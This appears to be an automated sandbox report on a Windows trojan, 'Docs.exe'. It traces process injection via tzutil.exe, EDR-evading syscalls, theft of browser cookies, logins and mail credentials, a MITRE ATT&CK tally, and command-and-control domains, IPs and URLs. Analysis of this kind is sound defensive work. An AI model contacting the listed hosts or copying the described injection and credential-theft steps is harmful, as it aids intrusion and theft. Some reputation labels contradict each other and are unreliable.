                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E420 mov eax, dword ptr fs:[00000030h]3_2_0159E420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159C427 mov eax, dword ptr fs:[00000030h]3_2_0159C427
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A04E5 mov ecx, dword ptr fs:[00000030h]3_2_015A04E5
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162A4B0 mov eax, dword ptr fs:[00000030h]3_2_0162A4B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D44B0 mov ecx, dword ptr fs:[00000030h]3_2_015D44B0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A64AB mov eax, dword ptr fs:[00000030h]3_2_015A64AB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165A49A mov eax, dword ptr fs:[00000030h]3_2_0165A49A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0750 mov eax, dword ptr fs:[00000030h]3_2_015A0750
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2750 mov eax, dword ptr fs:[00000030h]3_2_015E2750
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015E2750 mov eax, dword ptr fs:[00000030h]3_2_015E2750
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D674D mov esi, dword ptr fs:[00000030h]3_2_015D674D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D674D mov eax, dword ptr fs:[00000030h]3_2_015D674D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D674D mov eax, dword ptr fs:[00000030h]3_2_015D674D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8770 mov eax, dword ptr fs:[00000030h]3_2_015A8770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0770 mov eax, dword ptr fs:[00000030h]3_2_015B0770
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01624755 mov eax, dword ptr fs:[00000030h]3_2_01624755
Source: C:\Users\user\Desktop\Docs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtQueryValueKey: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtOpenKeyEx: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: NULL target: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Docs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe protection: read write
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\tzutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\tzutil.exe | Thread register set: target process: 6672
Source: C:\Windows\SysWOW64\tzutil.exe | Thread APC queued: target process: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
Source: C:\Users\user\Desktop\Docs.exe | Process created: C:\Users\user\Desktop\Docs.exe "C:\Users\user\Desktop\Docs.exe"
Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe | Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
Source: C:\Windows\SysWOW64\tzutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: hrhhgLQrQIpiVv.exe, 00000006.00000000.2520023857.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3289199042.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289194377.0000000001391000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: hrhhgLQrQIpiVv.exe, 00000006.00000000.2520023857.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3289199042.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289194377.0000000001391000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: hrhhgLQrQIpiVv.exe, 00000006.00000000.2520023857.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3289199042.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289194377.0000000001391000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                      Source: hrhhgLQrQIpiVv.exe, 00000006.00000000.2520023857.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3289199042.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289194377.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Users\user\Desktop\Docs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

Source: Yara match | File source: 3.2.Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Docs.exe.3ae24c8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Docs.exe.7030000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Docs.exe.7030000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Docs.exe.2b3dd24.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2061956351.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2061498149.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\tzutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\tzutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

Source: Yara match | File source: 3.2.Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Docs.exe.3ae24c8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Docs.exe.7030000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Docs.exe.7030000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Docs.exe.2b3dd24.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2061956351.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2061498149.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix: techniques observed for this sample, by tactic, with the number of signature hits per technique (empty matrix cells are not listed)

• Persistence: 1 DLL Side-Loading
• Privilege Escalation: 312 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading
• Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 312 Process Injection; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 22 Software Packing; 1 Timestomp; 1 DLL Side-Loading
• Credential Access: 1 OS Credential Dumping
• Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery
• Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System
• Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol
Behavior Graph (ID: 1564721, Sample: Docs.exe, Startdate: 28/11/2024, Architecture: WINDOWS, Score: 100)

Network nodes: www.070001325.xyz; www.learnwithus.site; 4 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 7 other signatures; Performs DNS queries to domains with low reputation (www.070001325.xyz)

Process chain:
• Docs.exe (started): dropped C:\Users\user\AppData\Local\...\Docs.exe.log (ASCII); started a second Docs.exe
• Docs.exe (child): Maps a DLL or memory area into another process; injected into hrhhgLQrQIpiVv.exe
• hrhhgLQrQIpiVv.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); started tzutil.exe
• tzutil.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures; injected into hrhhgLQrQIpiVv.exe; started firefox.exe
• hrhhgLQrQIpiVv.exe (injected by tzutil.exe): Found direct / indirect Syscall (likely to bypass EDR); network contacts: www.expancz.top 107.155.56.30 (ports 49736, 49737, 49738; UHGL-AS-APUCloudHKHoldingsGroupLimitedHK, United States); www.070001325.xyz 161.97.142.144 (ports 49735, 80; CONTABODE, United States); dns.ladipage.com 18.139.62.226 (ports 49740, 49741, 49742; AMAZON-02US, United States)

Antivirus results (files)
Source | Detection | Scanner | Label
Docs.exe | 37% | ReversingLabs | ByteCode-MSIL.Trojan.Genie8DN
Docs.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus results (URLs)
Source | Detection | Scanner | Label
http://www.taxiquynhonnew.click | 0% | Avira URL Cloud | safe
http://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp | 100% | Avira URL Cloud | malware
http://www.070001325.xyz/gebt/?rvEtL=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edh05neJJauEoNaZQG1y+cvjoSHU7S86EKf7lUg55fOkggqQ==&mFTD=mPHXHp | 0% | Avira URL Cloud | safe
http://www.taxiquynhonnew.click/y49d/ | 100% | Avira URL Cloud | malware
https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM | 100% | Avira URL Cloud | malware
https://dq0ib5xlct7tw.cloudfront.net/ | 0% | Avira URL Cloud | safe
https://l3filejson4dvd.josyliving.com/favicon.ico | 0% | Avira URL Cloud | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.expancz.top | 107.155.56.30 | true | true | | unknown
www.learnwithus.site | 209.74.77.107 | true | true | | unknown
dns.ladipage.com | 18.139.62.226 | true | false | | high
www.070001325.xyz | 161.97.142.144 | true | true | | unknown
www.epitomize.shop | unknown | unknown | false | | unknown
www.taxiquynhonnew.click | unknown | unknown | false | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.taxiquynhonnew.click/y49d/ | true | Avira URL Cloud: malware | unknown
http://www.070001325.xyz/gebt/?rvEtL=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edh05neJJauEoNaZQG1y+cvjoSHU7S86EKf7lUg55fOkggqQ==&mFTD=mPHXHp | true | Avira URL Cloud: safe | unknown
http://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp | true | Avira URL Cloud: malware | unknown
URLs found in memory or binary data
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://l3filejson4dvd.josyliving.com/favicon.ico | tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://connect.facebook.net/en_US/fbevents.js | tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s.yimg.com/wi/ytc.js | tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://analytics.tiktok.com/i18n/pixel/events.js | tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dq0ib5xlct7tw.cloudfront.net/ | hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.taxiquynhonnew.click | hrhhgLQrQIpiVv.exe, 00000008.00000002.3288549550.0000000000E4D000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.live | tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmp | false | | high
